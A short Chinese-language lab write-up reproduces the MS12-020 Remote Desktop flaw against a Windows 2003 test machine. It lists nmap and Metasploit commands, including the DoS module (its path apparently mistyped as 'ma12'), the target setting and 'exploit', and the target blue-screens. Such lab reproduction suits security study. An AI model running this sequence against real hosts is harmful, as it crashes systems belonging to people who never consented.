一、原理
ms12-020漏洞的定義是指操作系統的遠程桌面協議存在重大漏洞,入侵者(黑客)可以通過向遠程桌面默認端口(3389)發一系列特定RDP包,從而獲取超級管理員權限,進而入侵系統。
根據實際被入侵終端進行分析,開放遠程桌面服務並使用默認的3389端口的會成為攻擊目標。
二、實驗環境
攻擊機:kali
靶機win2003 ip:192. 168.252.136
兩者都在同一內網,采用NAT連接方式
三、漏洞復現
1、開啟win2003的遠程桌面:控制面板-->系統-->遠程-->遠程協助-->遠程桌面
2、控制面板-->windows防火牆-->例外-->遠程桌面
3、用nmap掃描靶機,發現靶機的3389端口已經打開
輸入:nmap 192.168.252.136
4、在kali的終端中打開msfconsole
5、使用search功能搜索ms12-020,發現有兩個可用模塊。
輸入:search ms12-020
6、使用第一個可用版模塊
輸入:use auxiliary/dos/windows/rdp/ma12_020_maxchannelids
7、利用set命令設置攻擊的IP。
輸入:set rhosts 192.168.252.136
show options
8、輸入:exploit,執行攻擊
9、看一下靶機,發現靶機藍屏了
